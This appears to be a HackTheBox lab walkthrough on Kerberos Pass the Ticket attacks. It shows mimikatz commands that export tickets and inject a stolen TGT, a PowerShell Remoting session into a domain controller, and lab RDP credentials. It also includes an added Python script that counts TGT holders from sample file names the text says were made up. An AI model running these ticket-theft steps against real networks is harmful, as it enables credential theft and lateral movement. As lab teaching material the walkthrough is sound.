Pass the Ticket (PtT) from Windows
ℹ️ Information
- 🌐 Website: HackTheBox
- 📚 Module: Password Attacks
- 🔗 Link: Pass the Ticket (PtT) from Windows
Provided Credentials: RDP to the target with user "Administrator" and password "AnotherC0mpl3xP4$$"
❓Question
Connect to the target machine using RDP and the provided creds. Export all tickets present on the computer. How many users' TGTs did you collect?
📋 Walkthrough
Let's connect to the target with remmina or xfreerdp.
PS C:\tools> .\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::tickets /export
<SNIP>
mimikatz # exit
Bye!
PS C:\tools> dir *.kirbi
krbtgt
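The question asks for the number of distinct users whose TGT was exported, not the number of .kirbi files: one user can hold several tickets, and service tickets (cifs, ldap, ...) are not TGTs. The following Python script is an added example, not part of the module or of mimikatz; it parses file names in the shape mimikatz wrote on this page (`[LUID]-group-index-flags-client@service-realm.kirbi`) and counts distinct clients whose ticket is for the `krbtgt` service. The meaning of the numeric fields and every name other than `john@krbtgt-INLANEFREIGHT.HTB` is assumed or constructed for illustration; the same triage is useful to a responder who finds a directory of exported tickets on a compromised host.

```python
"""Triage mimikatz-style .kirbi export names and count distinct TGT holders (added example)."""
import re
from collections import defaultdict

# Constructed sample input. Only the john@krbtgt name appears on the page; the
# other file names are made up in the same shape for illustration.
SAMPLE_KIRBI_NAMES = [
    "[0;49d09]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi",
    "[0;49d09]-2-1-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi",    # second TGT, same user
    "[0;49d09]-0-0-40a50000-john@cifs-DC01.inlanefreight.htb.kirbi",  # service ticket, not a TGT
    "[0;3e7]-2-0-40e10000-WS01$@krbtgt-INLANEFREIGHT.HTB.kirbi",      # machine account TGT
    "[0;1234ab]-2-0-40e10000-Administrator@krbtgt-INLANEFREIGHT.HTB.kirbi",
    "[0;1234ab]-0-1-40a50000-Administrator@ldap-DC01.inlanefreight.htb.kirbi",
    "notes.txt",                                                      # unrelated file, skipped
]

# Assumed layout, derived from the page's example file name:
#   [<LUID>]-<group>-<index>-<flags>-<client>@<service>-<rest>.kirbi
# Only the client and service parts are relied on below; the numeric fields
# are captured for display and their exact meaning is not assumed.
KIRBI_RE = re.compile(
    r"^\[(?P<luid>[0-9a-fA-F]+;[0-9a-fA-F]+)\]"
    r"-(?P<group>\d+)-(?P<index>\d+)-(?P<flags>[0-9a-fA-F]+)"
    r"-(?P<client>[^@]+)@(?P<service>[^-]+)-(?P<rest>.+)\.kirbi$"
)


def parse_kirbi_name(name):
    """Return the fields of one export file name, or None if it is not a .kirbi export."""
    m = KIRBI_RE.match(name)
    if not m:
        return None
    fields = m.groupdict()
    # A ticket whose service is krbtgt is a TGT; anything else is a service ticket.
    fields["is_tgt"] = fields["service"].lower() == "krbtgt"
    return fields


def tgt_holders(names):
    """Map each distinct TGT client (case-insensitive) to the logon sessions (LUIDs) it was seen in."""
    holders = defaultdict(set)
    for name in names:
        ticket = parse_kirbi_name(name)
        if ticket and ticket["is_tgt"]:
            holders[ticket["client"].lower()].add(ticket["luid"])
    return {client: sorted(luids) for client, luids in sorted(holders.items())}


def count_tgt_users(names):
    """Number of distinct users (or machine accounts) that had a TGT in the export."""
    return len(tgt_holders(names))


if __name__ == "__main__":
    for client, luids in tgt_holders(SAMPLE_KIRBI_NAMES).items():
        print(f"{client:15} TGT in logon session(s): {', '.join(luids)}")
    print("distinct accounts with a TGT:", count_tgt_users(SAMPLE_KIRBI_NAMES))
```

On the constructed sample the script reports three distinct accounts (john, WS01$, Administrator): john's two TGTs count once and his cifs service ticket is excluded. On a real host you would feed it the output of a directory listing instead of the embedded list.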
Answer
3
❓Question
Use john's TGT to perform a Pass the Ticket attack and retrieve the flag from the shared folder \\DC01.inlanefreight.htb\john
📋 Walkthrough
Answer
[REDACTED]
❓Question
Use john's TGT to perform a Pass the Ticket attack and connect to the DC01 using PowerShell Remoting. Read the flag from C:\john\john.txt
📋 Walkthrough
We can follow the module's instructions using mimikatz or Rubeus to do this lateral movement.
PS C:\tools> .\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # kerberos::ptt "C:\tools\[0;49d09]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"
* File: 'C:\tools\[0;49d09]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi': OK
mimikatz # exit
Bye!
PS C:\tools> Enter-PPSession -ComputerName DC01
Enter-PPSession : The term 'Enter-PPSession' is not recognized as the name of a cmdlet,
function, script file, or operable program. Check the spelling of the name, or if a
path was included, verify that the path is correct and try again.
At line:1 char:1
+ Enter-PPSession -ComputerName DC01
+ ~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Enter-PPSession:String) [], CommandNotFo
undException
+ FullyQualifiedErrorId : CommandNotFoundException
PS C:\tools> Enter-PSSession -ComputerName DC01
[DC01]: PS C:\Users\john\Documents> whoami
inlanefreight\john
Answer
[REDACTED]